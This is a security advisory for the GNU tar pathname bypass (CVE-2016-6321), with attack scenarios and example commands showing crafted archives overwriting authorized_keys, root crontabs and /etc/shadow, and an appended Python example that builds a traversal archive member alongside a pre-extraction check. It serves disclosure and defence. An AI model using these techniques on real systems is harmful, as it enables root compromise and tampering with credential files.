Full Disclosure: [CSS] POINTYFEATHER / tar extract pathname bypass (CVE-2016-6321)

Thursday, 27 October 2016 at 19:21

Here are a number of practical attack scenarios:

- Attack the user by replacing important files, such as
 .ssh/authorized_keys, .bashrc, .bash_logout, .profile,
 .subversion or .anyconnect, when they extract a tar archive.
  For example:

 user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \
 --wildcards 'blurf*'
 tar: Removing leading `blurf/../' from member names
 user@host:~$ cat .ssh/authorized_keys
 ssh-rsa AAAAB3...nU= mrrobot@fsociety

- Attack automation that extracts tar originating from a web
 application or similar sources. Such operation might be performed by
 a setuid root component of the application. The command executed
 could be for example:

 # tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

 The attacker can overwrite /var/spool/cron/crontabs/root to gain code
 execution as root. It is also possible to replace binaries commonly
 executed by root with backdoored ones, or to drop setuid root
 binaries that will enable the attacker to gain root privileges at
 will. A common attack would be to replace some network-facing daemon
 with a backdoored one, enabling covert code execution on demand.

 This type of scenario has been successfully exploited in the real
 world to gain remote code execution as root in different

- Attack commands that try to replace single files/dirs as root:

 The victim would like to replace the `/etc/motd' file in the system by
 extracting it from an archive obtained from an untrusted source:

 # tar -C / -xvf archive.tar etc/motd
 tar: Removing leading `etc/motd/../' from member names

 The attacker can also bypass an --exclude rule if it is being used
 with the --anchored switch. For example, the victim would like to extract
 all files but `/etc/shadow' from an archive:

 # tar -C / -xvf archive.tar --anchored --exclude etc/shadow
 tar: Removing leading `etc/motd/../' from member names

 In both cases, the attacker has now successfully replaced the /etc/shadow
 file with arbitrary content.

Exploiting the vulnerability works best if the attacker has some prior knowledge of the specifics of the tar command line that gets executed. The path prefix before the `..' sequence will need to (at least partially) match the target path (or not match, in the case of the exclude rule) in order for the bypass to work. Guessing which paths the victim might extract could work too, but the success rate is likely lower.
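The mismatch described above, as an added Python example that is not part of the advisory or of GNU tar: member selection and --anchored --exclude are modelled as leading-path matches on the raw member name, while the "Removing leading ..." warning on this page shows tar dropping everything up to and including the last `..' component only afterwards. The archive, its member contents and the helper names are constructed for this example; has_traversal() is the pre-extraction check a defender would run instead of letting names be rewritten.

```python
import io
import tarfile


def build_sample_archive() -> bytes:
    """Constructed in-memory tar: one benign member and one using the
    `prefix/../target' naming pattern the advisory describes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in (("etc/motd", b"welcome\n"),
                              ("etc/motd/../etc/shadow", b"constructed\n")):
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def member_names(archive: bytes) -> list[str]:
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tf:
        return tf.getnames()          # raw names, exactly as stored


def selected(name: str, wanted: str) -> bool:
    """Member selection as a leading-path match on the raw name: the stage
    that `etc/motd/../etc/shadow' satisfies for a wanted `etc/motd'."""
    return name == wanted or name.startswith(wanted + "/")


def excluded_anchored(name: str, pattern: str) -> bool:
    """--anchored --exclude PATTERN, again matched on the raw name."""
    return name == pattern or name.startswith(pattern + "/")


def stripped_name(name: str) -> str:
    """Where the member lands: drop every component up to and including the
    last `..' (the `Removing leading ...' behaviour shown on the page)."""
    parts = name.split("/")
    last = max((i for i, p in enumerate(parts) if p == ".."), default=-1)
    return "/".join(p for p in parts[last + 1:] if p)


def has_traversal(name: str) -> bool:
    """Defender's pre-extraction check: reject absolute names or any `..'
    component outright rather than rewriting them."""
    return name.startswith("/") or ".." in name.split("/")


def audit(archive: bytes, wanted: str, exclude: str) -> dict[str, dict]:
    """Per member: what the raw-name checks decide versus where it lands."""
    return {n: {"selected": selected(n, wanted),
                "excluded": excluded_anchored(n, exclude),
                "lands_at": stripped_name(n),
                "reject": has_traversal(n)}
            for n in member_names(archive)}
```

Running audit() on the sample archive with wanted "etc/motd" and exclude "etc/shadow" shows the crafted member passing both raw-name checks yet landing at etc/shadow, and has_traversal() flagging it.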

Vulnerable versions

- GNU tar 1.14 to 1.29 (inclusive)